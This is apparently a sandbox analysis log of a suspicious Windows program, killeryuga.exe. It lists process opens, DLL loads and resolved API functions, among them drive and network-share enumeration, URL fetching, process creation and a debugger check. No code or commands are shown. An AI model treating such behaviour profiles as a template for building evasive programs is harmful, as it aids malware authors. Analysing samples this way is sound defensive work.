Open c:\program files\microsoft sql server compact edition\noble-technologies.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\cardiovascularhear.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\assets_portion.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\landgovernmental.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\packed bags.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\reference assemblies\tale-plaintiff-basename.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 8
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 3
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 287
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 12
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 12
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 9
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 3
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 6
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 2
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 2
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 8
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 3
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 4
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 4
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 2
Fn
Open c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe desired_access = SYNCHRONIZE True 15
Fn
Module (561)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 2
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 2
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 2
Fn
Load USER32.dll base_address = 0x74f40000 True 2
Fn
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74b30000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74af0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74b50000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x74a80000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 48
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 15
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74b33058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74b32f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74b32dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
